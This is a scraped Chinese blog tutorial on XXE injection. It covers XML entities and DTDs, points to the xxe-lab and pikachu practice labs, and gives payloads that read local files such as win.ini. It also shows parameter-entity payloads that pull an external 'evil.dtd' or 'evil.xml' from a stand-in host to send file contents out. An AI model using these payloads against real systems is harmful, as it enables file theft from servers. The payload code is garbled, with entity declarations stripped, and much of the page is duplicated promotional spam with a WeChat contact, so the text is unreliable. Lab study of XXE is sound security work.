Web安全之XXE漏洞_x-requested-with xmlhttprequest,2024年最新带你一起探究网络安全事件分发机制

]>
&test;

(2)参数实体

参数实体的声明:<!ENTITY % 实体名称 "实体内容">
引用参数实体的方法:%实体名称;

<?xml version="1.0"?> <!ENTITY % dtd SYSTEM "http://localhost/evil.xml">

%dtd;
%send;
]>

1.4.2、PCDATA

PCDATA 的意思是被解析的字符数据(parsed character data)。
在DTD中,指定某个标签中的内容是字符数据。由于它的内容也是需要解析器来解析的,所有仍然需要转换>, <, &, ', "这5个特殊字符。

在DTD中声明:

<!ELEMENT name (#PCDATA)>

它表示在和标签之间可以插入字符或者子标签。

1.4.3、CDATA

CDATA 的意思是字符数据(character data),CDATA 是不会被解析器解析的文本。
在DTD中,指定标签中某个属性的类型为字符型。如果需要使用>, <, &, ', "这5个特殊字符,应当用对应的替代替代字符来表示

在DTD中声明:

<!ATTLIST a b CDATA>

它表示在a这个标签中,b属性应该是字符类型。
比如

<![CDATA[...]]>:内容不必被XML解析器解析时,使用<![CDATA[...]]>,经常把程序代码嵌入到<![CDATA[...]]>中。

在XML中声明:

<![CDATA[ if(i<10){ System.out.println("i<10"); } ]]>

1.5、DTD

DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。
DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。

1.5.1、DTD实体

DTD实体中,又分为内部实体声明外部实体声明

  • 内部实体声明 :<!ENTITY entity-name "entity-value">

DTD 实例:

<!ENTITY writer "Donald Duck."> <!ENTITY copyright "Copyright runoob.com">

XML 实例:
&writer;&copyright;

  • 外部实体声明:<!ENTITY entity-name SYSTEM "URI/URL">

DTD 实例:

<!ENTITY writer SYSTEM "http://www.runoob.com/entities.dtd"> <!ENTITY copyright SYSTEM "http://www.runoob.com/entities.dtd">

XML 实例:
&writer;&copyright;

二、环境下载

xxe-lab:https://github.com/c0ny1/xxe-lab

pikachu:https://github.com/zhuifengshaonianhanlu/pikachu

三、漏洞利用

3.1、XXE漏洞判断

一般看见这样的,就可能存在 XML 外部实体注入即 XXE。

//文件类型为 XML
Content-Type: application/xml;charset=utf-8

//请求头含有XML
X-Requested-With: XMLHttpRequest

//包括数据包中的数据可能是如下的这种形式,都可以进行一个判断
admin123

3.2、有回显XXE

访问 XXE-Lab 的 PHP 环境靶场:http://127.0.0.1/xxe-lab/php_xxe/

随便输入个账号木马然后点击登录进行抓包。

将数据包发送到 Repeater 模块,构造 Payload 读取 win.ini 文件。

<?xml version="1.0"?>

]>
&xxe;123

接着再本地随便一个盘符创建一个 xml_test.txt 文件内容为:

, <, &, ', "flag{asdavghagdhjagsdhjas}

尝试对取这个 txt 文本。

<?xml version="1.0"?>

]>
&xxe;123

直接报错了,因为我们的文档里含有一些特殊符号 XML 中不允许出现特殊符号。

当读取的数据存在特殊符号的时候,我们可以用 <![CDATA[...]]>。

首先在自己的本地或 vps 上的 Web 目录创建一个 dtd 文件,内容如下:

<!ENTITY all "%start;%xxe;%end;">

然后构造 Payload 读取 txt 文本内容。

<?xml version="1.0" encoding="utf-8"?> <!ENTITY % xxe SYSTEM "file:///F:/xml_test.txt"> <!ENTITY % end "]]>"> <!ENTITY % dtd SYSTEM "http://ip/evil.dtd">

%dtd; ]>

&all;123

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
img

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
img

775da.gif#pic_center)

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
[外链图片转存中…(img-drGoLEaq-1712725910781)]

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值